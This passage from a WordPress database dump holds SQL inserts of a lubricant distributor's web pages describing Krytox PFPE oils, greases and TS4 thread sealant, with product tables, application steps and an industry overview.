reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricating Fluids for Vacuum Pump Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox Vacuum Pump Fluids</td>\r\n<td colspan="2">Krytox vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extra High Temperature Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- S, SX</td>\r\n<td colspan="2">This Krytox grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- AC, ACX</td>\r\n<td colspan="2">This Krytox grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- BD, BDX, BDZ</td>\r\n<td colspan="2">This Krytox grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 246</td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 407</td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about Krytox visit: https://en.wikipedia.org/wiki/Krytox\r\n\r\nTo learn more about our product line please visit:\r\n\r\nhttps://www.miller-stephenson.com/products/\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-09-28 13:15:05', '2016-09-28 13:15:05', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2055, 2, '2016-09-28 13:30:02', '2016-09-28 13:30:02', 'Discovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new Krytox perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. Krytox oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, Krytox is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs—Krytox can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><strong>Krytox Performance Lubricants Product Line</strong></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox for General Purpose Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 10X Oil / 20X Grease</td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 21X</td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 22X</td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Aerospace Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 143</td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 240</td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 250</td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 283</td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extended Performance Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A series oils/XP 2A series greases</td>\r\n<td colspan="2">The Krytox XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricating Fluids for Vacuum Pump Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox Vacuum Pump Fluids</td>\r\n<td colspan="2">Krytox vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extra High Temperature Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- S, SX</td>\r\n<td colspan="2">This Krytox grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- AC, ACX</td>\r\n<td colspan="2">This Krytox grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- BD, BDX, BDZ</td>\r\n<td colspan="2">This Krytox grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 246</td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 407</td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about Krytox visit: <a href="https://en.wikipedia.org/wiki/Krytox">https://en.wikipedia.org/wiki/Krytox</a>\r\n\r\nTo learn more about our product line please visit:\r\n\r\nhttps://www.miller-stephenson.com/products/\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-09-28 13:30:02', '2016-09-28 13:30:02', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2056, 2, '2016-09-28 13:43:08', '2016-09-28 13:43:08', '<h1>[share title=""]</h1>\r\n<h1><strong>Krytox TS4 Thread Sealant</strong></h1>\r\n<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\r\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly. Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\r\n<h4><strong>Key Benefits of Krytox™ TS4:</strong></h4>\r\n<ul>\r\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\r\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\r\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\r\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\r\n 	<li>No VOC content or hydrocarbon</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Cost-effective- only a small amount of sealant needed</li>\r\n 	<li>Fast and easy to apply</li>\r\n</ul>\r\n<h4><strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong></h4>\r\n<ul>\r\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\r\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\r\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\r\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\r\n</ul>\r\n<h4><strong>Recommended Product:</strong></h4>\r\n[ux_product_categories ids="165" number="10"]\r\n\r\n&nbsp;', 'TS4 Thread Sealant', '', 'publish', 'closed', 'closed', '', 'krytox-ts4-thread-sealant', '', '', '2017-02-23 15:23:17', '2017-02-23 15:23:17', '', 0, 'https://www.miller-stephenson.com/?p=2056', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2057, 2, '2016-09-28 13:43:08', '2016-09-28 13:43:08', '<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\r\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly.Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\r\n\r\n<strong>Key Benefits of Kytox™ TS4:</strong>\r\n<ul>\r\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\r\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\r\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\r\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\r\n 	<li>No VOC content or hydrocarbon</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Cost-effective- only a small amount of sealant needed</li>\r\n 	<li>Fast and easy to apply</li>\r\n</ul>\r\n<strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong>\r\n<ul>\r\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\r\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\r\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\r\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\r\n</ul>\r\nTo learn more about TS4 please visit <a href="https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/">https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/</a>', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-revision-v1', '', '', '2016-09-28 13:43:08', '2016-09-28 13:43:08', '', 2056, 'https://www.miller-stephenson.com/2056-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2058, 2, '2016-09-28 15:55:16', '2016-09-28 15:55:16', '&nbsp;\r\n<p style="text-align: center;"><span style="font-size: 140%;"><strong>Choose Your Industry</strong></span></p>\r\n[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive2">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#board">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#petro">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#elec">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#food">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#med">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#metal">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#oxy">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#power">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#pulp">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#text">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#tire">Tire Mold</a>\r\n\r\n[/col]\r\n<a name="aerospace"></a>\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span>\r\n\r\n<span style="font-size: 110%;"><strong>Aerospace, Aviation, and National Defense</strong></span>\r\n<ul>\r\n 	<li><span style="font-size: 100%;">Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</span></li>\r\n 	<li><span style="font-size: 100%;">Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</span></li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purpose formulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing</li>\r\n 	<li>Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space</li>\r\n 	<li>Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n<a name="automotive"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Automotive—Squeak and Rattle</strong></span>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather on leather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n<a name="automotive2"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Automotive—Mechanical Systems</strong></span>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided state of-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh under hood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Under hood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, anti lock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n<a name="petro"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Chemical and Petrochemical</strong></span>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n<a name="board"></a>\r\n[ux_product_categories ids="36,38,34" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Box Board Corrugating</strong></span>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox 